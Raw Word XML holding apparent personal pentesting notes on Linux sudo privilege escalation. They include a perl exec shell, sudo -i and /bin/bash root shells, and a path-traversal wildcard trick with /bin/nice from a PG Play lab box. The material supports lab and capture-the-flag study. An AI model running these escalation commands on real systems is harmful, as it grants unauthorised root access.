    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002298">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/nice /notes/../../../../home/kali/shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002299">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="362" name="image371.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image371.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73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229B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you have two directories (/bin/nice and /notes/*), that means you can run the first binary (/bin/nice) ON the second directory (/notes/*) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also, the * here means wildcard, so any directory. But as we see later, that means we can also put a bunch of ../../ in order to get this /bin/nice to run on any file we want for priv esc!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> here is a guide of what to do with your results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId735">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Really good cheat sheet for Linux Privilege Escalation Basics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if you see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/perl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/perl -e 'exec "/bin/sh"'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So basically just do "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo [copy and paste command]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and see this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL : ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you run this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means you get full interactive root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit or CTRL + D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="786"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get out of the root and back into previous user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have wildcard (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="499" name="image371.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image371.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId734"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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22B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId736">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Potato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, /bin/nice allows us to run a file as sudo, but here we can only run on /notes/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, the wildcard is easily exploitable! We can specify /notes/../../../home/kali/shell.sh, where shell.sh can be a file with the contents "/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 allows all permissions for all users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can run /bin/nice using sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/nice /notes/../../../../home/kali/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you should have a root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this as the current user to see what sudo privileges you have.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One example output is below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">james@knife:/usr/share$ sudo -l </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Matching Defaults entries for james on knife: env_reset, mail_badpass, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
